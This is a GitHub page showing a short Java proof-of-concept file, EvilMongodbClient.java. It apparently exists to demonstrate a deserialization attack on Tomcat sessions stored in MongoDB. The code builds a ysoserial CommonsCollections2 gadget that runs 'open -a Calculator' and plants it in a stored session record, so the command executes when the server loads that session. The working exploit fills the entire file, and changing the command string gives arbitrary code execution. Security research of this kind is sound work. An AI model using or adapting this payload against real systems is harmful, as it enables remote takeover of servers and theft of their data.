-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathEvilMongodbClient.java
30 lines (20 loc) · 1 KB
/
EvilMongodbClient.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
package com.nosqlclient.tomcat;
import com.mongodb.BasicDBObject;
import com.mongodb.MongoClient;
import com.mongodb.client.ListCollectionsIterable;
import com.mongodb.client.MongoDatabase;
import org.bson.Document;
import org.bson.types.ObjectId;
import ysoserial.payloads.ObjectPayload;
public class EvilMongodbClient {
public static void main(String[] args) {
MongoClient client = new MongoClient("localhost", 27017);
MongoDatabase db = client.getDatabase("tomcat_sessions");
ListCollectionsIterable<Document> collections = db.listCollections();
Object payloadObject = ObjectPayload.Utils.makePayloadObject("CommonsCollections2", "open -a Calculator");
byte[] SerialData = SerializeUtil.serialize(payloadObject);
db.getCollection("tomcat.sessions").updateOne(
new BasicDBObject("_id", new ObjectId("5ec96c9a2a3cd7a39bc36901")),
new BasicDBObject("$set", new BasicDBObject("data", SerialData)));
}
}